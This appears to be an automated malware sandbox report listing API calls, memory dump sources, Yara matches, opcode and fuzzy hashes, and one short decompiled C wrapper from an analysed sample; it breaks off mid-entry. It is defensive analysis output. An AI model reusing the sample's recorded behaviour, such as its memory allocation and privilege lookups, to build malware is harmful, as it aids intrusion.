                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 013EE1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1378638983-0
                                                                                  • Opcode ID: b4a782a38ec139c653a6f06e71bf96c084f4e6454ddebe2d1a28ffeda71e3fd1
                                                                                  • Instruction ID: 86d2c6204e9f86c8f1638a8193d19318bde72f6540daa2e2cbd3a7292baacc41
                                                                                  • Opcode Fuzzy Hash: b4a782a38ec139c653a6f06e71bf96c084f4e6454ddebe2d1a28ffeda71e3fd1
                                                                                  • Instruction Fuzzy Hash: 401103B5900318DFDB10DF99D888BDEBBF8EB58324F14841AE915A7340C374A949CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 013EE1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1378638983-0
                                                                                  • Opcode ID: a82cad294e414705e73bfed749d5b1f8a4faa6b93eb27b5e0c006fbc540f87d8
                                                                                  • Instruction ID: 0cd0370ddaa42f1d8da84abb8497193640e989bbd8460b1a3c8756cb4d268bba
                                                                                  • Opcode Fuzzy Hash: a82cad294e414705e73bfed749d5b1f8a4faa6b93eb27b5e0c006fbc540f87d8
                                                                                  • Instruction Fuzzy Hash: 6F1112B5800318CFDB10DF99D888BDEBBF8EB48324F10841AE914A3340C374A948CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af8029578c1b645b9559dc078e7d71261bf84fd7269111db653f85cfab90f439
                                                                                  • Instruction ID: 83653fbe27aa2a37f9dbecbb42d1d5f732651b2220b185ba9b4f90c7a0c7eecc
                                                                                  • Opcode Fuzzy Hash: af8029578c1b645b9559dc078e7d71261bf84fd7269111db653f85cfab90f439
                                                                                  • Instruction Fuzzy Hash: A3527DB1500B06CFD732CF5AE6C85997BB1FB45328F904218D1616FAE9D3B8698ACF44
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.250295626.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6009cc464a3b9b7f5122488ac9db8ce022c8435001b6785a2b272fbee8ab7fbc
                                                                                  • Instruction ID: c24134165e4369502e20df792091e2c171243c390fa1b567f33c1e12f7e78b85
                                                                                  • Opcode Fuzzy Hash: 6009cc464a3b9b7f5122488ac9db8ce022c8435001b6785a2b272fbee8ab7fbc
                                                                                  • Instruction Fuzzy Hash: 67A17132E0031A8FCF06CFA9C84859EBBF2FF85304B15856AE905BB265EB359945CF40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID: R=A$R=A
                                                                                  • API String ID: 2738559852-3742021989
                                                                                  • Opcode ID: 70067cdd1c74621638cabaa7177c1fd80e7c0fe7fcc567be2bb0a1ac9b880601
                                                                                  • Instruction ID: 463bab87a4bd95a43e8606868e28964cbda32e348ed646a95a701fcfc1f639f3
                                                                                  • Opcode Fuzzy Hash: 70067cdd1c74621638cabaa7177c1fd80e7c0fe7fcc567be2bb0a1ac9b880601
                                                                                  • Instruction Fuzzy Hash: 8FF0E7B2200208ABCB04DF89DC81DEB77A9EF8C714F01865DBE1D97241DA30E8528BA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                  				void* _t18;
                                                                                  				void* _t27;
                                                                                  				intOrPtr* _t28;
                                                                                  
                                                                                  				_t13 = _a4;
                                                                                  				_t28 = _a4 + 0xc48;
                                                                                  				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                  				_t6 =  &_a32; // 0x413d52
                                                                                  				_t12 =  &_a8; // 0x413d52
                                                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                  				return _t18;
                                                                                  			}






                                                                                  0x00418273
                                                                                  0x0041827f
                                                                                  0x00418287
                                                                                  0x00418292
                                                                                  0x004182ad
                                                                                  0x004182b5
                                                                                  0x004182b9

                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID: R=A$R=A
                                                                                  • API String ID: 2738559852-3742021989
                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                  • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                  • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                  • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 97b0bcd6e48fa671eef23b499f5cc9c6ff78566e78e9794ca6568538f1a0d781
                                                                                  • Instruction ID: 3daf387c33b6ec9965c5bbb40a8c33452ce253938e2c0b772f3a2d3f07b1ed6b
                                                                                  • Opcode Fuzzy Hash: 97b0bcd6e48fa671eef23b499f5cc9c6ff78566e78e9794ca6568538f1a0d781
                                                                                  • Instruction Fuzzy Hash: 3301AFB2244108AFDB08CF99DC95EEB37A9AF9C354F158248BA0D97241D634E8558BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                  • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                  • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 10849bdb30dbc0c456434228a3696cb0a056b7bcef33e2f588f41bd8eb9c8643
                                                                                  • Instruction ID: c3205dfa88d7ee5b2796d7d353fa07faf5ae30103d3ca7005ca9d02f322e8242
                                                                                  • Opcode Fuzzy Hash: 10849bdb30dbc0c456434228a3696cb0a056b7bcef33e2f588f41bd8eb9c8643
                                                                                  • Instruction Fuzzy Hash: FEF058B1200209ABCB14DF89CC80EAB77ADAF88650F008248FA1897281C630E810CBE4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                  • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                  • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 812d545bc369fb294616b59a634041c18071e761e6286a2cb8ffc3e218ccfc6f
                                                                                  • Instruction ID: 7832a966c833ca7bc51c8dade971ba1aa8e2d6a28ad4be72cf81d5889afa21ae
                                                                                  • Opcode Fuzzy Hash: 812d545bc369fb294616b59a634041c18071e761e6286a2cb8ffc3e218ccfc6f
                                                                                  • Instruction Fuzzy Hash: 20E08C75240200ABD710EBA49C45EE77B68EF48624F094499BA485B282CA30E90087D0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                  • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                  • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 07497d68eb3064e2a50022bb604feb5b83e845de53c0e1d0bf7317f6119892b4
                                                                                  • Instruction ID: 1dd796ec6d8611d4710909a930a1e1956b396ffe12813c2696f3378c607026d8
                                                                                  • Opcode Fuzzy Hash: 07497d68eb3064e2a50022bb604feb5b83e845de53c0e1d0bf7317f6119892b4
                                                                                  • Instruction Fuzzy Hash: EB90026170500902D20171594805626440F97D0381F92D072A2015555ECA658992F171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b37e370795195bb214ac895e95723442484b80a10333391a15f3b15938527eec
                                                                                  • Instruction ID: 2c263b98afa517cbd7694c34359f9bc05476d213677e2aa0ca81aef0d084f610
                                                                                  • Opcode Fuzzy Hash: b37e370795195bb214ac895e95723442484b80a10333391a15f3b15938527eec
                                                                                  • Instruction Fuzzy Hash: 3390027130500813D21161594905717440E97D0381F92D462A1415558D96968952F161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 02f5bef326073fd47ab52026727a1ba1577d5e3decd607e3122f5809c75bfda8
                                                                                  • Instruction ID: df0c2a10b485dc20f83df95165b42bce0ec4762ec500662db2ae81c09684ea22
                                                                                  • Opcode Fuzzy Hash: 02f5bef326073fd47ab52026727a1ba1577d5e3decd607e3122f5809c75bfda8
                                                                                  • Instruction Fuzzy Hash: 39900261346045525645B1594805517840BA7E0381792D062A2405950C85669856F661
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2e9cf1051765da5a4ed1e810f16c3bb3b4f3931d89c73f0cf5d7e2b15f2e2871
                                                                                  • Instruction ID: 5fe78b8e8a5bf13dde6278050a468842fdff0f633731342155bc6200aef82ad3
                                                                                  • Opcode Fuzzy Hash: 2e9cf1051765da5a4ed1e810f16c3bb3b4f3931d89c73f0cf5d7e2b15f2e2871
                                                                                  • Instruction Fuzzy Hash: F79002A130600403420571594815626840F97E0341B52D071E2005590DC5658891B165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4df0d5895471c9d599ffed5220261d21039b58ca4c90351554967e7c609ab24d
                                                                                  • Instruction ID: 62f8001cd35450bbe962e4abe46b9d4661325dbe05aab115f557b996cf548327
                                                                                  • Opcode Fuzzy Hash: 4df0d5895471c9d599ffed5220261d21039b58ca4c90351554967e7c609ab24d
                                                                                  • Instruction Fuzzy Hash: 519002A134500842D20061594815B16440AD7E1341F52D065E2055554D8659CC52B166
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e80d7c203125cfc2431a995e6be34e42da736c2e90a990fe91fa815cae2c4adb
                                                                                  • Instruction ID: ef42eeee6fef04835790744074149e92fff04e6c12f8a526eeca7f5211ea28f8
                                                                                  • Opcode Fuzzy Hash: e80d7c203125cfc2431a995e6be34e42da736c2e90a990fe91fa815cae2c4adb
                                                                                  • Instruction Fuzzy Hash: E7900265315004030205A5590B05517444B97D5391352D071F2006550CD6618861B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: dc067b670126f556ebd329ce32b03f8845794a6dfbf1ddc7b2d9cfb9c0b5d473
                                                                                  • Instruction ID: 0999c95da0bce4362f2acba8bc545f51bbe946d06e9dbf54d540e8d41acefa7d
                                                                                  • Opcode Fuzzy Hash: dc067b670126f556ebd329ce32b03f8845794a6dfbf1ddc7b2d9cfb9c0b5d473
                                                                                  • Instruction Fuzzy Hash: 579002B130500802D24071594805756440A97D0341F52D061A6055554E86998DD5B6A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f9bedaddb025c4e1d92d05970df6e27a5d52e95db099a8ab57550ba0e141cd3b
                                                                                  • Instruction ID: 62dec4ac64d6c71fdcf66a0a64c947fd6626740dbf433f38535b43e1bce99781
                                                                                  • Opcode Fuzzy Hash: f9bedaddb025c4e1d92d05970df6e27a5d52e95db099a8ab57550ba0e141cd3b
                                                                                  • Instruction Fuzzy Hash: 6790027130508C02D2106159880575A440A97D0341F56D461A5415658D86D58891B161
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 928216486e98d5a809e8bd54a4b9f92d56bbd6476405d995a2cc5b2091897e49
                                                                                  • Instruction ID: 842eeeba38ecddfe2dfa9c1a00305f0785380481860f0cb741bf96040b13f930
                                                                                  • Opcode Fuzzy Hash: 928216486e98d5a809e8bd54a4b9f92d56bbd6476405d995a2cc5b2091897e49
                                                                                  • Instruction Fuzzy Hash: 6290027130500C02D2807159480565A440A97D1341F92D065A1016654DCA558A59B7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b4ec9d7ccc6ca826f5a29d05bb9170989231d19a33c4946eed6c0008f02e4008
                                                                                  • Instruction ID: d2f5c062e4e318d0b09503cad91f87246df6171bb1341a61331479854a6ec08c
                                                                                  • Opcode Fuzzy Hash: b4ec9d7ccc6ca826f5a29d05bb9170989231d19a33c4946eed6c0008f02e4008
                                                                                  • Instruction Fuzzy Hash: E390026131580442D30065694C15B17440A97D0343F52D165A1145554CC9558861B561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7ec1332fde69519660cb26865358955b21695c2fb218c095ffb0e7a9150c97d4
                                                                                  • Instruction ID: 707c0f37a0f316d3163453ad7bfe81c55b34544a9167a6b5fd0f97c011aa08a1
                                                                                  • Opcode Fuzzy Hash: 7ec1332fde69519660cb26865358955b21695c2fb218c095ffb0e7a9150c97d4
                                                                                  • Instruction Fuzzy Hash: 4190026170500442424071698C45916840ABBE1351752D171A1989550D85998865B6A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 65f2be950ea6edb2ad71edb286ba06595b379719aa7902faf72e6ce6eaa798d9
                                                                                  • Instruction ID: 6728a7e5c13068317a48e43076935c8c852b3295ada8bfeb684a0cc180c3ac42
                                                                                  • Opcode Fuzzy Hash: 65f2be950ea6edb2ad71edb286ba06595b379719aa7902faf72e6ce6eaa798d9
                                                                                  • Instruction Fuzzy Hash: 2B90027130540802D20061594C1571B440A97D0342F52D061A2155555D86658851B5B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9c2047604797d8163a01b8244d79b23ce296bf94fa98c3e048356d75f0f6d408
                                                                                  • Instruction ID: a034525c81828c1ec29053a4cd53afcb594596de4b1d4a74792f6dd5e1d2dd22
                                                                                  • Opcode Fuzzy Hash: 9c2047604797d8163a01b8244d79b23ce296bf94fa98c3e048356d75f0f6d408
                                                                                  • Instruction Fuzzy Hash: 6C90027131514802D21061598805716440A97D1341F52D461A1815558D86D58891B162
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f8bf7dc65f1bd13375cda1aac3923d4bea73e0f86ac89258ec9f6c3060f28229
                                                                                  • Instruction ID: 67544cfb884fc932befe172dffe9c00490c58328a331d9f3e8711b56adb93647
                                                                                  • Opcode Fuzzy Hash: f8bf7dc65f1bd13375cda1aac3923d4bea73e0f86ac89258ec9f6c3060f28229
                                                                                  • Instruction Fuzzy Hash: 4690026130500403D24071595819616840AE7E1341F52E061E1405554CD9558856B262
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6a56e6c8747f39cf0ee9dff26182f7535b65349751b4dfd9c3cb51f82caa8878
                                                                                  • Instruction ID: 1f6a00a6bc9f0dde659ae5847edbb6adff764ba44c678a6fa3f9a5eec4c37951
                                                                                  • Opcode Fuzzy Hash: 6a56e6c8747f39cf0ee9dff26182f7535b65349751b4dfd9c3cb51f82caa8878
                                                                                  • Instruction Fuzzy Hash: 5190026931700402D2807159580961A440A97D1342F92E465A1006558CC9558869B361
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 43a6195d730e4ad9945c274c40140792233625d521976a6490cf9e567cf278ae
                                                                                  • Instruction ID: 2b43761035f8185698258c0be4d28ec73f1371f1f32d718f19329fba7df6d973
                                                                                  • Opcode Fuzzy Hash: 43a6195d730e4ad9945c274c40140792233625d521976a6490cf9e567cf278ae
                                                                                  • Instruction Fuzzy Hash: 3890027130500802D20065995809656440A97E0341F52E061A6015555EC6A58891B171
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                  • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                  • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                  • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                  • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                  • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                  • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LookupPrivilegeValue
                                                                                  • String ID:
                                                                                  • API String ID: 3899507212-0
                                                                                  • Opcode ID: d57d74175e6019994fd9ba53c3da2f56edbd5a6daf1530240949727d58b914cb
